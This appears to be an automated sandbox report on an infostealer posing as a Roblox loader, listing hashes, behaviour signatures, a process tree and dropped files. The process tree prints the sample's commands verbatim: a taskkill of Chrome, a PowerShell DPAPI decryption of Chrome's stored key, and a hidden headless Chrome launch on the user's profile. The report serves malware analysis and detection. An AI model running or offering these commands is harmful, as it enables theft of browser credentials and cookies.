Analysis

  • max time kernel
    63s
  • max time network
    68s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-10-2024 16:44

General

  • Target

    RobloxLoader.exe

  • Size

    36.9MB

  • MD5

    c1f06056c5480224c8f4139028ca5f8e

  • SHA1

    aa32bc3480ce763e720d47c2a47907df47f930b0

  • SHA256

    4d9b1a73f95cc6a00e7f2cd032c4f877fc15bf66d4f6ec9b61b18e37e791750f

  • SHA512

    f8289ebd899772487dc3a3cddd1d69ca8bbc30526c946b8a1fe910cfcfb18335847008b521c228d0dd522d619e65c43cbf4a87cf81492f96550511a13edef10b

  • SSDEEP

    393216:qQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mgl96l+ZArYsFRlPy9:q3on1HvSzxAMNlFZArYsX1Ys3WL/

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Kills process with taskkill 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\RobloxLoader.exe
    "C:\Users\Admin\AppData\Local\Temp\RobloxLoader.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2160
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get name"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1848
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic logicaldisk get name
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1816
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:664
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM chrome.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1988
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,2,142,118,8,95,31,118,64,160,100,56,129,213,73,187,252,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,113,106,0,247,215,176,4,214,100,69,24,12,82,184,99,251,48,99,62,224,63,15,20,29,91,157,107,67,169,249,96,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,121,179,237,157,205,101,66,46,197,237,84,78,146,147,24,228,86,99,11,181,9,197,187,81,221,135,249,220,177,151,54,48,0,0,0,201,32,108,188,0,214,238,125,56,14,128,232,126,3,179,153,60,210,117,251,33,154,83,61,107,79,102,158,116,82,197,193,171,143,252,200,195,47,26,56,146,47,159,112,126,10,213,222,64,0,0,0,126,107,51,243,210,113,53,220,214,140,169,196,68,149,197,199,57,133,144,71,163,241,191,42,246,87,185,8,107,45,47,241,156,235,130,58,10,186,143,102,250,211,197,126,173,68,108,167,40,14,195,38,121,76,232,215,128,91,229,33,134,94,213,207), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:3584
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,2,142,118,8,95,31,118,64,160,100,56,129,213,73,187,252,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,233,113,106,0,247,215,176,4,214,100,69,24,12,82,184,99,251,48,99,62,224,63,15,20,29,91,157,107,67,169,249,96,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,252,121,179,237,157,205,101,66,46,197,237,84,78,146,147,24,228,86,99,11,181,9,197,187,81,221,135,249,220,177,151,54,48,0,0,0,201,32,108,188,0,214,238,125,56,14,128,232,126,3,179,153,60,210,117,251,33,154,83,61,107,79,102,158,116,82,197,193,171,143,252,200,195,47,26,56,146,47,159,112,126,10,213,222,64,0,0,0,126,107,51,243,210,113,53,220,214,140,169,196,68,149,197,199,57,133,144,71,163,241,191,42,246,87,185,8,107,45,47,241,156,235,130,58,10,186,143,102,250,211,197,126,173,68,108,167,40,14,195,38,121,76,232,215,128,91,229,33,134,94,213,207), $null, 'CurrentUser')
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5088
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM chrome.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3184
      • C:\Windows\system32\taskkill.exe
        taskkill /F /IM chrome.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1384
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --headless --window-position=-10000,-10000
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4600
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff97478cc40,0x7ff97478cc4c,0x7ff97478cc58
        3⤵
          PID:2820
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --field-trial-handle=1436,i,10202923576128820199,12732699221550718157,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1428 /prefetch:2
          3⤵
            PID:1052
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --field-trial-handle=1752,i,10202923576128820199,12732699221550718157,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1748 /prefetch:3
            3⤵
              PID:4236
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --field-trial-handle=1788,i,10202923576128820199,12732699221550718157,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=1780 /prefetch:1
              3⤵
              • Drops file in Program Files directory
              PID:1532

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5s1500yk.rtf.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

          Filesize

          1.8MB

          MD5

          66a65322c9d362a23cf3d3f7735d5430

          SHA1

          ed59f3e4b0b16b759b866ef7293d26a1512b952e

          SHA256

          f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

          SHA512

          0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

        • C:\Users\Admin\AppData\Roaming\node_sqlite3.node

          Filesize

          274KB

          MD5

          7cbb230781b09f0543c935ce1d17dad0

          SHA1

          84d30df3dd76a7bd50ce54ae461277002abd619e

          SHA256

          90d39ca6189c82070a36a8f7784fb44578d05ba4c043ba42d254b76bcfe47a4d

          SHA512

          14a9964bbde4e2c05077bfabb518a99e6108fb3dc4acc69905fbfa2f295b119edfdd3f758d8913fd1faac96c18c90e6b97cc14568e931d0732e8b1a24e5d5fdf

        • memory/5088-82-0x0000011F57E90000-0x0000011F57EB2000-memory.dmp

          Filesize

          136KB

        • memory/5088-83-0x0000011F582A0000-0x0000011F582F0000-memory.dmp

          Filesize

          320KB